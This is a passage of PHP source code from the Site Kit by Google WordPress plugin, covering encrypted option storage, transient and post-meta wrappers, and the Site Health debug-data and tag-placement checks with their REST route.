$raw_value Value to decrypt. * @return string|bool Decrypted value, or false on failure. */ public function decrypt( $raw_value ) { if ( ! extension_loaded( 'openssl' ) || ! is_string( $raw_value ) ) { return $raw_value; } $decoded_value = base64_decode( $raw_value, true ); if ( false === $decoded_value ) { return $raw_value; } $method = 'aes-256-ctr'; $ivlen = openssl_cipher_iv_length( $method ); $iv = substr( $decoded_value, 0, $ivlen ); $decoded_value = substr( $decoded_value, $ivlen ); $value = openssl_decrypt( $decoded_value, $method, $this->key, 0, $iv ); if ( ! $value || substr( $value, - strlen( $this->salt ) ) !== $this->salt ) { return false; } return substr( $value, 0, - strlen( $this->salt ) ); } /** * Gets the default encryption key to use. * * @since 1.0.0 * * @return string Default (not user-based) encryption key. */ private function get_default_key() { if ( defined( 'GOOGLESITEKIT_ENCRYPTION_KEY' ) && '' !== GOOGLESITEKIT_ENCRYPTION_KEY ) { return GOOGLESITEKIT_ENCRYPTION_KEY; } if ( defined( 'LOGGED_IN_KEY' ) && '' !== LOGGED_IN_KEY ) { return LOGGED_IN_KEY; } // If this is reached, you're either not on a live site or have a serious security issue. return 'das-ist-kein-geheimer-schluessel'; } /** * Gets the default encryption salt to use. * * @since 1.0.0 * * @return string Encryption salt. */ private function get_default_salt() { if ( defined( 'GOOGLESITEKIT_ENCRYPTION_SALT' ) && '' !== GOOGLESITEKIT_ENCRYPTION_SALT ) { return GOOGLESITEKIT_ENCRYPTION_SALT; } if ( defined( 'LOGGED_IN_SALT' ) && '' !== LOGGED_IN_SALT ) { return LOGGED_IN_SALT; } // If this is reached, you're either not on a live site or have a serious security issue. return 'das-ist-kein-geheimes-salz'; } } <?php /** * Class Google\Site_Kit\Core\Storage\Transients * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; use Google\Site_Kit\Context; /** * Class providing access to transients. * * It uses regular transients or network transients, depending on in which mode the plugin is running. * * @since 1.0.0 * @access private * @ignore */ final class Transients { /** * Plugin context. * * @since 1.0.0 * @var Context */ private $context; /** * Constructor. * * @since 1.0.0 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Gets the value of the given transient. * * @since 1.0.0 * * @param string $transient Transient name. * @return mixed Value set for the transient, or false if not set. */ public function get( $transient ) { if ( $this->context->is_network_mode() ) { return get_site_transient( $transient ); } return get_transient( $transient ); } /** * Sets the value for a transient. * * @since 1.0.0 * * @param string $transient Transient name. * @param mixed $value Transient value. Must be serializable if non-scalar. * @param int $expiration Optional. Time until expiration in seconds. Default 0 (no expiration). * @return bool True on success, false on failure. */ public function set( $transient, $value, $expiration = 0 ) { if ( $this->context->is_network_mode() ) { return set_site_transient( $transient, $value, $expiration ); } return set_transient( $transient, $value, $expiration ); } /** * Deletes the given transient. * * @since 1.0.0 * * @param string $transient Transient name. * @return bool True on success, false on failure. */ public function delete( $transient ) { if ( $this->context->is_network_mode() ) { return delete_site_transient( $transient ); } return delete_transient( $transient ); } } <?php /** * Class Google\Site_Kit\Core\Storage\Post_Meta * * @package Google\Site_Kit\Core\Storage * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Post metadata storage class. * * @since 1.33.0 * @access private * @ignore */ final class Post_Meta implements Meta_Interface { /** * Gets post meta. * * @since 1.33.0 * * @param int $post_id Post ID. * @param string $key Metadata key. * @param bool $single Whether to return a single value. * @return mixed Post meta value. */ public function get( $post_id, $key, $single = false ) { return get_post_meta( $post_id, $key, $single ); } /** * Updates a post meta field based on the given post ID. * * @since 1.33.0 * * @param int $post_id Post ID. * @param string $key Metadata key. * @param mixed $value Metadata value. * @param mixed $prev_value Previous value to check before updating. If specified, only update existing metadata entries with this value. Otherwise, update all entries. * @return bool TRUE on success, otherwise FALSE. */ public function update( $post_id, $key, $value, $prev_value = '' ) { return update_post_meta( $post_id, $key, $value, $prev_value ); } /** * Adds a meta field to the given post. * * @since 1.33.0 * * @param int $post_id Post ID. * @param string $key Metadata key. * @param mixed $value Metadata value. * @param bool $unique Whether the same key should not be added. * @return int|bool Meta id on success, otherwise FALSE. */ public function add( $post_id, $key, $value, $unique = false ) { return add_post_meta( $post_id, $key, $value, $unique ); } /** * Deletes a post meta field for the given post ID. * * @since 1.33.0 * * @param int $post_id Post ID. * @param string $key Metadata key. * @param mixed $value Metadata value. If provided, rows will only be removed that match the value. * @return bool TRUE on success, otherwise FALSE. */ public function delete( $post_id, $key, $value = '' ) { return delete_post_meta( $post_id, $key, $value ); } } <?php /** * Interface Google\Site_Kit\Core\Storage\Meta_Interface * * @package Google\Site_Kit\Core\Storage * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Interface for object meta implementations. * * @since 1.33.0 * @since 1.146.0 Renamed from Post_Meta_Interface to Meta_Interface. * * @access private * @ignore */ interface Meta_Interface { /** * Gets object meta. * * @since 1.33.0 * * @param int $object_id Object ID. * @param string $key Metadata key. * @param bool $single Whether to return a single value. * @return mixed Object meta value. */ public function get( $object_id, $key, $single = false ); /** * Updates an object meta field based on the given object ID. * * @since 1.33.0 * * @param int $object_id Object ID. * @param string $key Metadata key. * @param mixed $value Metadata value. * @param mixed $prev_value Previous value to check before updating. If specified, only update existing metadata entries with this value. Otherwise, update all entries. * @return bool TRUE on success, otherwise FALSE. */ public function update( $object_id, $key, $value, $prev_value = '' ); /** * Adds a meta field to the given object. * * @since 1.33.0 * * @param int $object_id Object ID. * @param string $key Metadata key. * @param mixed $value Metadata value. * @param bool $unique Whether the same key should not be added. * @return int|bool Meta id on success, otherwise FALSE. */ public function add( $object_id, $key, $value, $unique = false ); /** * Deletes an object meta field for the given object ID. * * @since 1.33.0 * * @param int $object_id Object ID. * @param string $key Metadata key. * @param mixed $value Metadata value. If provided, rows will only be removed that match the value. * @return bool TRUE on success, otherwise FALSE. */ public function delete( $object_id, $key, $value = '' ); } <?php /** * Class Google\Site_Kit\Core\Site_Health\Debug_Data * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Site_Health; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Authentication\Authentication; use Google\Site_Kit\Core\Authentication\Clients\OAuth_Client; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Tracking; use Google\Site_Kit\Core\Email_Reporting\Email_Reporting_Settings as Site_Email_Reporting_Settings; use Google\Site_Kit\Core\Email_Reporting\Email_Reporting_Site_Health; use Google\Site_Kit\Core\Key_Metrics\Key_Metrics_Settings; use Google\Site_Kit\Core\Key_Metrics\Key_Metrics_Setup_Completed_By; use Google\Site_Kit\Core\Modules\Module; use Google\Site_Kit\Core\Modules\Module_With_Debug_Fields; use Google\Site_Kit\Core\Modules\Modules; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\Tags\Google_Tag_Gateway\Google_Tag_Gateway; use Google\Site_Kit\Core\Util\Feature_Flags; use Google\Site_Kit\Core\Util\Scopes; /** * Class for integrating debug information with Site Health. * * @since 1.5.0 * @access private * @ignore */ class Debug_Data { /** * Context instance. * * @since 1.5.0 * @var Context */ private $context; /** * Options instance. * * @since 1.5.0 * @var Options */ private $options; /** * User_Options instance. * * @since 1.5.0 * @var User_Options */ private $user_options; /** * Authentication instance. * * @since 1.5.0 * @var Authentication */ private $authentication; /** * Modules instance. * * @since 1.5.0 * @var Modules */ private $modules; /** * Permissions instance. * * @since 1.69.0 * @var Permissions */ private $permissions; /** * Constructor. * * @since 1.5.0 * * @param Context $context Context instance. * @param Options $options Options instance. * @param User_Options $user_options User_Options instance. * @param Authentication $authentication Authentication instance. * @param Modules $modules Modules instance. * @param Permissions $permissions Permissions instance. */ public function __construct( Context $context, Options $options, User_Options $user_options, Authentication $authentication, Modules $modules, Permissions $permissions ) { $this->context = $context; $this->options = $options; $this->user_options = $user_options; $this->authentication = $authentication; $this->modules = $modules; $this->permissions = $permissions; } /** * Registers debug information with Site Health. * * @since 1.5.0 */ public function register() { add_filter( 'debug_information', function ( $info ) { $info['google-site-kit'] = array( 'label' => __( 'Site Kit by Google', 'google-site-kit' ), 'fields' => $this->get_fields(), ); return $info; } ); } /** * Redacts the given string by overwriting a portion with a mask character. * * @since 1.5.0 * * @param string $input_string Input string to redact. * @param int $mask_start Starting position of redaction and length of preserved characters. * If positive, characters are redacted from the end, preserving the first X characters. * If negative, characters are redacted from the beginning preserving the last X characters. * @return string */ public static function redact_debug_value( $input_string, $mask_start = 4 ) { if ( ! is_scalar( $input_string ) ) { return ''; } $input_string = (string) $input_string; if ( $mask_start < 0 ) { $redacted = substr( $input_string, 0, $mask_start ); $unmasked = substr( $input_string, $mask_start ); return str_repeat( '•', strlen( $redacted ) ) . $unmasked; } else { $redacted = substr( $input_string, $mask_start ); $unmasked = substr( $input_string, 0, $mask_start ); return $unmasked . str_repeat( '•', strlen( $redacted ) ); } } /** * Gets all fields. * * @since 1.5.0 * * @return array */ protected function get_fields() { $fields = array( 'version' => array( 'label' => __( 'Version', 'google-site-kit' ), 'value' => GOOGLESITEKIT_VERSION, ), 'php_version' => array( 'label' => __( 'PHP Version', 'google-site-kit' ), 'value' => PHP_VERSION, ), 'wp_version' => array( 'label' => __( 'WordPress Version', 'google-site-kit' ), 'value' => get_bloginfo( 'version' ), ), 'reference_url' => array( 'label' => __( 'Reference Site URL', 'google-site-kit' ), 'value' => $this->context->get_reference_site_url(), ), 'amp_mode' => $this->get_amp_mode_field(), 'site_status' => $this->get_site_status_field(), 'user_status' => $this->get_user_status_field(), 'verification_status' => $this->get_verification_status_field(), 'connected_user_count' => $this->get_connected_user_count_field(), 'active_modules' => $this->get_active_modules_field(), 'recoverable_modules' => $this->get_recoverable_modules_field(), 'required_scopes' => $this->get_required_scopes_field(), 'capabilities' => $this->get_capabilities_field(), 'enabled_features' => $this->get_feature_fields(), ); $fields = array_merge( $fields, $this->get_active_conversion_event_provider_fields() ); $fields = array_merge( $fields, $this->get_consent_mode_fields() ); $fields = array_merge( $fields, $this->get_module_sharing_settings_fields() ); $fields = array_merge( $fields, $this->get_key_metrics_fields() ); $fields = array_merge( $fields, $this->get_gtg_fields() ); if ( Feature_Flags::enabled( 'proactiveUserEngagement' ) ) { $fields = array_merge( $fields, $this->get_email_reports_fields() ); } $fields = array_filter( array_merge( $fields, $this->get_module_fields() ) ); $none = __( 'None', 'google-site-kit' ); return array_map( function ( $field ) use ( $none ) { if ( empty( $field['value'] ) ) { $field['value'] = $none; $field['debug'] = 'none'; } return $field; }, $fields ); } /** * Gets the field definition for the amp_mode field. * * @since 1.5.0 * * @return array */ private function get_amp_mode_field() { $mode = $this->context->get_amp_mode(); $mode_map = array( 'primary' => __( 'Primary', 'google-site-kit' ), 'secondary' => __( 'Secondary', 'google-site-kit' ), ); return array( 'label' => __( 'AMP Mode', 'google-site-kit' ), 'value' => isset( $mode_map[ $mode ] ) ? $mode_map[ $mode ] : __( 'No', 'google-site-kit' ), 'debug' => isset( $mode_map[ $mode ] ) ? $mode : 'no', ); } /** * Gets the field definition for the site_status field. * * @since 1.5.0 * * @return array */ private function get_site_status_field() { $is_connected = $this->authentication->credentials()->has(); $using_proxy = $this->authentication->credentials()->using_proxy(); $status_map = array( 'connected-site' => __( 'Connected through site credentials', 'google-site-kit' ), 'connected-oauth' => __( 'Connected through OAuth client credentials', 'google-site-kit' ), 'not-connected' => __( 'Not connected', 'google-site-kit' ), ); if ( $is_connected && $using_proxy ) { $status = 'connected-site'; } elseif ( $is_connected && ! $using_proxy ) { $status = 'connected-oauth'; } else { $status = 'not-connected'; } return array( 'label' => __( 'Site Status', 'google-site-kit' ), 'value' => $status_map[ $status ], 'debug' => $status, ); } /** * Gets the field definition for the user_status field. * * @since 1.5.0 * * @return array */ private function get_user_status_field() { $is_connected = $this->authentication->is_authenticated(); return array( 'label' => __( 'User Status', 'google-site-kit' ), 'value' => $is_connected ? __( 'Authenticated', 'google-site-kit' ) : __( 'Not authenticated', 'google-site-kit' ), 'debug' => $is_connected ? 'authenticated' : 'not authenticated', ); } /** * Gets the field definition for the verification_status field. * * @since 1.37.0 * * @return array */ private function get_verification_status_field() { $label = __( 'Verification Status', 'google-site-kit' ); $is_verified = $this->authentication->verification()->get(); $is_verified_by_file_token = $this->authentication->verification_file()->get(); $is_verified_by_meta_tag = $this->authentication->verification_meta()->get(); if ( ! $is_verified ) { return array( 'label' => $label, 'value' => __( 'Not verified', 'google-site-kit' ), 'debug' => 'not-verified', ); } if ( $is_verified_by_file_token ) { return array( 'label' => $label, 'value' => __( 'Verified through file', 'google-site-kit' ), 'debug' => 'verified-file', ); } if ( $is_verified_by_meta_tag ) { return array( 'label' => $label, 'value' => __( 'Verified through meta tag', 'google-site-kit' ), 'debug' => 'verified-meta', ); } return array( 'label' => $label, 'value' => __( 'Verified outside of Site Kit', 'google-site-kit' ), 'debug' => 'verified-non-site-kit', ); } /** * Gets the number of users with a Site Kit token. * * @since 1.16.0 * * @return array */ private function get_connected_user_count_field() { $users = new \WP_User_Query( array( // phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_key 'meta_key' => $this->user_options->get_meta_key( OAuth_Client::OPTION_ACCESS_TOKEN ), 'fields' => 'ID', 'compare' => 'EXISTS', ) ); return array( 'label' => __( 'Connected user count', 'google-site-kit' ), 'value' => $users->get_total(), ); } /** * Gets the field definition for the active_modules field. * * @since 1.5.0 * * @return array */ private function get_active_modules_field() { $active_modules = $this->modules->get_active_modules(); return array( 'label' => __( 'Active Modules', 'google-site-kit' ), 'value' => join( /* translators: used between list items, there is a space after the comma. */ __( ', ', 'google-site-kit' ), wp_list_pluck( $active_modules, 'name' ) ), 'debug' => join( ', ', wp_list_pluck( $active_modules, 'slug' ) ), ); } /** * Gets the field definition for the recoverable_modules field. * * @since 1.78.0 * * @return array */ private function get_recoverable_modules_field() { $recoverable_modules = $this->modules->get_recoverable_modules(); return array( 'label' => __( 'Recoverable Modules', 'google-site-kit' ), 'value' => join( /* translators: used between list items, there is a space after the comma. */ __( ', ', 'google-site-kit' ), wp_list_pluck( $recoverable_modules, 'name' ) ), 'debug' => join( ', ', wp_list_pluck( $recoverable_modules, 'slug' ) ), ); } /** * Gets the field definition for the module_sharing_settings field. * * @since 1.78.0 * * @return array */ private function get_module_sharing_settings_fields() { $sharing_settings = $this->modules->get_module_sharing_settings(); $fields = array(); foreach ( $this->modules->get_shareable_modules() as $module_slug => $module ) { $module_settings = $sharing_settings->get_module( $module_slug ); $fields[ "{$module_slug}_shared_roles" ] = array_merge( array( /* translators: %s: module name */ 'label' => sprintf( __( '%s: Shared Roles', 'google-site-kit' ), $module->name ), ), $this->get_module_shared_role_names( $module_settings['sharedRoles'] ) ); $fields[ "{$module_slug}_management" ] = array_merge( array( /* translators: %s: module name */ 'label' => sprintf( __( '%s: Management', 'google-site-kit' ), $module->name ), ), $this->get_module_management( $module_settings['management'] ) ); } return $fields; } /** * Gets the comma separated list of shared role names for module_sharing_settings. * * @since 1.78.0 * * @param array $role_slugs List of role slugs. * * @return array $role_names Comma separated list of role names for module_sharing_settings within value and debug keys. */ private function get_module_shared_role_names( $role_slugs ) { if ( ! $role_slugs ) { return array( 'value' => __( 'None', 'google-site-kit' ), 'debug' => 'none', ); } $wp_role_names = wp_roles()->get_names(); $shared_role_names = array_filter( $wp_role_names, function ( $key ) use ( $role_slugs ) { return in_array( $key, $role_slugs, true ); }, ARRAY_FILTER_USE_KEY ); return array( 'value' => join( /* translators: used between list items, there is a space after the comma. */ __( ', ', 'google-site-kit' ), $shared_role_names ), 'debug' => join( ', ', $role_slugs ), ); } /** * Gets the user friendly and debug values for module management used in module_sharing_settings. * * @since 1.78.0 * * @param string $management The module sharing settings management value. Can be either `owner` or `all_admins`. * * @return array User friendly and debug values for module management used in module_sharing_settings within value and debug keys. */ private function get_module_management( $management ) { switch ( $management ) { case 'all_admins': return array( 'value' => __( 'Any admin signed in with Google', 'google-site-kit' ), 'debug' => 'all_admins', ); default: return array( 'value' => __( 'Owner', 'google-site-kit' ), 'debug' => 'owner', ); } } /** * Gets the field definition for the required_scopes field. * * @since 1.5.0 * * @return array */ private function get_required_scopes_field() { $required_scopes = $this->authentication->get_oauth_client()->get_required_scopes(); $granted_scopes = $this->authentication->get_oauth_client()->get_granted_scopes(); $value = array(); foreach ( $required_scopes as $scope ) { $satisfied = Scopes::is_satisfied_by( $scope, $granted_scopes ); $value[ $scope ] = $satisfied ? '✅' : '⭕'; } return array( 'label' => __( 'Required scopes', 'google-site-kit' ), 'value' => $value, ); } /** * Gets capabilities for the current user. * * @since 1.21.0 * * @return array */ private function get_capabilities_field() { $value = array(); foreach ( $this->permissions->check_all_for_current_user() as $permission => $granted ) { $value[ $permission ] = $granted ? '✅' : '⭕'; } return array( 'label' => __( 'User Capabilities', 'google-site-kit' ), 'value' => $value, ); } /** * Gets field definitions for each active module that supports debug fields. * * @since 1.5.0 * * @return array A flat array of all module debug fields. */ private function get_module_fields() { $modules_with_debug_fields = array_filter( $this->modules->get_active_modules(), function ( Module $module ) { return $module instanceof Module_With_Debug_Fields; } ); $fields_by_module = array_map( function ( Module_With_Debug_Fields $module ) { return $module->get_debug_fields(); }, array_values( $modules_with_debug_fields ) ); return array_merge( array(), ...$fields_by_module ); } /** * Gets the available features. * * @since 1.26.0 * * @return array */ private function get_feature_fields() { $value = array(); $available_features = Feature_Flags::get_available_features(); foreach ( $available_features as $available_feature ) { $enabled_feature = Feature_Flags::enabled( $available_feature ); $value[ $available_feature ] = $enabled_feature ? '✅' : '⭕'; } return array( 'label' => __( 'Features', 'google-site-kit' ), 'value' => $value, ); } /** * Gets the consent mode fields. * * @since 1.125.0 * * @return array */ private function get_consent_mode_fields() { /** * Filters the status of consent mode in Site Kit. * * @since 1.125.0 * * @param string $status The consent mode status. Default: 'disabled'. */ $consent_mode_status = apply_filters( 'googlesitekit_consent_mode_status', 'disabled' ); $consent_api_active = function_exists( 'wp_set_consent' ); return array( 'consent_mode' => array( 'label' => __( 'Consent mode', 'google-site-kit' ), 'value' => 'enabled' === $consent_mode_status ? __( 'Enabled', 'google-site-kit' ) : __( 'Disabled', 'google-site-kit' ), 'debug' => $consent_mode_status, ), 'consent_api' => array( 'label' => __( 'WP Consent API', 'google-site-kit' ), 'value' => $consent_api_active ? __( 'Detected', 'google-site-kit' ) : __( 'Not detected', 'google-site-kit' ), 'debug' => $consent_api_active ? 'detected' : 'not-detected', ), ); } /** * Gets the conversion event names registered by the currently supported * active plugins. * * @since 1.127.0 * * @return array */ private function get_active_conversion_event_provider_fields() { $value = array(); $conversion_tracking = new Conversion_Tracking( $this->context ); $active_providers = $conversion_tracking->get_active_providers(); foreach ( $active_providers as $active_provider_slug => $active_provider ) { $value[ $active_provider_slug ] = $active_provider->get_debug_data(); } return array( 'active_conversion_event_providers' => array( 'label' => __( 'Active conversion event providers', 'google-site-kit' ), 'value' => $value, ), ); } /** * Gets the key metrics status fields. * * @since 1.141.0 * * @return array */ private function get_key_metrics_fields() { $is_setup_complete = ( new Key_Metrics_Setup_Completed_By( $this->options ) )->get(); $key_metrics_settings = ( new Key_Metrics_Settings( $this->user_options ) )->get(); if ( ! $is_setup_complete ) { return array( 'key_metrics_status' => array( 'label' => __( 'Key Metrics Status', 'google-site-kit' ), 'value' => __( 'Not setup', 'google-site-kit' ), ), ); } $key_metrics_status = isset( $key_metrics_settings['isWidgetHidden'] ) && $key_metrics_settings['isWidgetHidden'] ? __( 'Setup and Disabled', 'google-site-kit' ) : __( 'Setup and Enabled', 'google-site-kit' ); // A minimum of 2 key metrics need to be saved to prevent "default" tailored metrics to render. $key_metrics_source = isset( $key_metrics_settings['widgetSlugs'] ) && count( $key_metrics_settings['widgetSlugs'] ) > 1 ? __( 'Manual Selection', 'google-site-kit' ) : __( 'Tailored Metrics', 'google-site-kit' ); return array( 'key_metrics_status' => array( 'label' => __( 'Key Metrics Status', 'google-site-kit' ), 'value' => $key_metrics_status, ), 'key_metrics_source' => array( 'label' => __( 'Key Metrics Source', 'google-site-kit' ), 'value' => $key_metrics_source, ), ); } /** * Gets Email Reports Site Health fields. * * @since 1.166.0 * * @return array */ private function get_email_reports_fields() { $site_health = new Email_Reporting_Site_Health( new Site_Email_Reporting_Settings( $this->options ), $this->user_options ); return $site_health->get_debug_fields(); } /** * Gets debug fields for Google tag gateway. * * @since 1.162.0 * @return array */ private function get_gtg_fields() { if ( ! Feature_Flags::enabled( 'googleTagGateway' ) ) { return array(); } return ( new Google_Tag_Gateway( $this->context, $this->options ) )->get_debug_fields(); } } <?php /** * Class Google\Site_Kit\Core\Site_Health\Tag_Placement * * @package Google\Site_Kit\Core\Site_Health * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Site_Health; use Google\Site_Kit\Core\Modules\Modules; use Google\Site_Kit\Core\Modules\Module_With_Tag; use Google\Site_Kit\Core\Modules\Tags\Module_Tag_Matchers; use Google\Site_Kit\Core\REST_API\REST_Routes; use Google\Site_Kit\Core\Tags\Guards\Tag_Environment_Type_Guard; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; use Google\Site_Kit\Modules\Analytics_4; /** * Class for integrating status tab information with Site Health. * * @since 1.119.0 * @access private * @ignore */ class Tag_Placement { use Method_Proxy_Trait; /** * Modules instance. * * @since 1.119.0 * @var Modules */ private $modules; /** * Tag_Environment_Type_Guard instance. * * @since 1.119.0 * @var Tag_Environment_Type_Guard */ private $environment_tag_guard; /** * Constructor. * * @since 1.119.0 * * @param Modules $modules Modules instance. */ public function __construct( Modules $modules ) { $this->modules = $modules; $this->environment_tag_guard = new Tag_Environment_Type_Guard(); } /** * Registers functionality through WordPress hooks. * * @since 1.119.0 */ public function register() { add_filter( 'site_status_tests', function ( $tests ) { global $wp_version; if ( version_compare( $wp_version, '5.6', '<' ) ) { $tests['direct']['tag_placement'] = array( 'label' => __( 'Tag Placement', 'google-site-kit' ), 'test' => $this->get_method_proxy( 'tag_placement_test' ), ); return $tests; } $tests['async']['tag_placement'] = array( 'label' => __( 'Tag Placement', 'google-site-kit' ), 'test' => rest_url( '/' . REST_Routes::REST_ROOT . '/core/site/data/site-health-tag-placement-test' ), 'has_rest' => true, 'async_direct_test' => $this->get_method_proxy( 'tag_placement_test' ), ); return $tests; } ); } /** * Checks if the modules tags are placed on the website. * * @since 1.119.0 * * @return array Site health status results. */ public function tag_placement_test() { global $wp_version; $result = array( 'label' => __( 'Tag Placement', 'google-site-kit' ), 'status' => 'good', 'badge' => array( 'label' => __( 'Site Kit', 'google-site-kit' ), 'color' => 'blue', ), 'actions' => '', 'test' => 'tag_placement', ); if ( version_compare( $wp_version, '5.6', '<' ) ) { $result['description'] = sprintf( '<p>%s</p>', __( 'This feature requires WordPress version 5.6 or higher', 'google-site-kit' ) ); return $result; } if ( ! $this->environment_tag_guard->can_activate() ) { $result['description'] = sprintf( '<p>%s</p>', __( 'Tags are not output in the current environment.', 'google-site-kit' ) ); return $result; } $active_modules = $this->get_active_modules_with_tags(); if ( empty( $active_modules ) ) { $result['description'] = sprintf( '<p>%s</p>', __( 'Tag status not available: no modules that place tags are connected.', 'google-site-kit' ) ); return $result; } $descriptions = array(); foreach ( $active_modules as $module ) { $settings = $module->get_settings()->get(); $module_name = $module->name; // If module has `canUseSnippet` setting, check if it is disabled. if ( isset( $settings['canUseSnippet'] ) && empty( $settings['useSnippet'] ) ) { $descriptions[] = sprintf( '<li><strong>%s</strong>: %s</li>', $module_name, __( 'Tag placement disabled in settings.', 'google-site-kit' ) ); } else { $content_url = $module->get_content_url(); if ( is_string( $content_url ) ) { $content_url = array( $content_url ); } foreach ( $content_url as $label => $c_url ) { $url = add_query_arg( 'timestamp', time(), $c_url ); $response = wp_remote_get( $url ); // phpcs:ignore WordPressVIPMinimum.Functions.RestrictedFunctions.wp_remote_get_wp_remote_get $module_label = is_numeric( $label ) ? $module_name : $module_name . ' (' . $label . ')'; if ( is_wp_error( $response ) ) { $descriptions[] = sprintf( '<li><strong>%s</strong>: %s</li>', $module_label, __( 'There was an error while trying to get the status, please try again later.', 'google-site-kit' ) ); continue; } $response = wp_remote_retrieve_body( $response ); $tag_found = $this->check_if_tag_exists( $module, $response, $module_label ); if ( $tag_found ) { $descriptions[] = $tag_found; } } } } if ( ! empty( $descriptions ) ) { $result['description'] = '<ul>' . join( "\n", $descriptions ) . '</ul>'; } return $result; } /** * Filters active modules to only those which are instances of Module_With_Tag. * * @since 1.119.0 * * @return array Filtered active modules instances. */ protected function get_active_modules_with_tags() { $active_modules = $this->modules->get_active_modules(); $active_modules = array_filter( $active_modules, function ( $module ) { return $module instanceof Module_With_Tag; } ); return $active_modules; } /** * Checks if tag exists. * * @since 1.119.0 * * @param Module_With_Tag $module Module instance. * @param string $content Content to search for the tags. * @param string $module_label Content URL page name appended to the module name to identify multiple tags for a module. * * @return bool TRUE if tag is found, FALSE if not. */ protected function check_if_tag_exists( $module, $content, $module_label = null ) { $check_tag = $module->has_placed_tag_in_content( $content ); $module_label = $module_label ? $module_label : $module->name; switch ( $check_tag ) { case Module_Tag_Matchers::TAG_EXISTS_WITH_COMMENTS: return sprintf( '<li><strong>%s</strong>: %s</li>', $module_label, __( 'Tag detected and placed by Site Kit.', 'google-site-kit' ) ); case Module_Tag_Matchers::TAG_EXISTS: return sprintf( '<li><strong>%s</strong>: %s</li>', $module_label, __( 'Tag detected but could not verify that Site Kit placed the tag.', 'google-site-kit' ) ); case Module_Tag_Matchers::NO_TAG_FOUND: return sprintf( '<li><strong>%s</strong>: %s</li>', $module_label, __( 'No tag detected.', 'google-site-kit' ) ); default: return sprintf( '<li><strong>%s</strong>: %s</li>', $module_label, __( 'No tag detected.', 'google-site-kit' ) ); } } } <?php /** * Class Google\Site_Kit\Core\Site_Health\REST_Site_Health_Controller * * @package Google\Site_Kit\Core\Site_Health * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Site_Health; use Google\Site_Kit\Core\REST_API\REST_Route; use WP_REST_Server; /** * Class for handling dismissed items rest routes. * * @since 1.119.0 * @access private * @ignore */ class REST_Site_Health_Controller { /** * Tag_Placement instance. * * @since 1.119.0 * @var Tag_Placement */ protected $tag_placement; /** * Constructor. * * @since 1.119.0 * * @param Tag_Placement $tag_placement Tags Placement instance. */ public function __construct( Tag_Placement $tag_placement ) { $this->tag_placement = $tag_placement; } /** * Registers functionality through WordPress hooks. * * @since 1.119.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); } /** * Gets REST route instances. * * @since 1.119.0 * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { return array( new REST_Route( 'core/site/data/site-health-tag-placement-test', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => array( $this->tag_placement, 'tag_placement_test' ), 'permission_callback' => function () { return current_user_can( 'view_site_health_checks' ); }, ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\Site_Health\Site_Health * * @package Google\Site_Kit\Core\Util * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Site_Health; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Authentication\Authentication; use Google\Site_Kit\Core\Modules\Modules; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Permissions\Permissions; /** * Class for integrating information with Site Health. * * @since 1.119.0 * @access private * @ignore */ class Site_Health { /** * Debug_Data instance. * * @since 1.119.0 * @var Debug_Data */ private $debug_data; /** * Tag_Placement instance. * * @since 1.119.0 * @var Tag_Placement */ private $tag_placement; /** * REST_Site_Health_Controller instance. * * @since 1.119.0 * @var REST_Site_Health_Controller */ protected $rest_controller; /** * Constructor. * * @since 1.119.0 * * @param Context $context Context instance. * @param Options $options Options instance. * @param User_Options $user_options User_Options instance. * @param Authentication $authentication Authentication instance. * @param Modules $modules Modules instance. * @param Permissions $permissions Permissions instance. */ public function __construct( Context $context, Options $options, User_Options $user_options, Authentication $authentication, Modules $modules, Permissions $permissions ) { $this->debug_data = new Debug_Data( $context, $options, $user_options, $authentication, $modules, $permissions ); $this->tag_placement = new Tag_Placement( $modules ); $this->rest_controller = new REST_Site_Health_Controller( $this->tag_placement ); } /** * Registers functionality through WordPress hooks. * * @since 1.119.0 */ public function register() { $this->debug_data->register(); $this->tag_placement->register(); $this->rest_controller->register(); } } <?php /** * Class Google\Site_Kit\Core\User_Input\User_Specific_Answers * * @package Google\Site_Kit\Core\User_Input * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User_Input; use Closure; use Google\Site_Kit\Core\Storage\User_Setting; /** * Class for handling the user specific answers in User Input. * * @since 1.90.0 * @access private * @ignore */ class User_Specific_Answers extends User_Setting { /** * The user option name for this setting. */ const OPTION = 'googlesitekit_user_input_settings'; /** * The scope for which the questions are handled by this class. */ const SCOPE = 'user'; /** * Gets the expected value type. * * @since 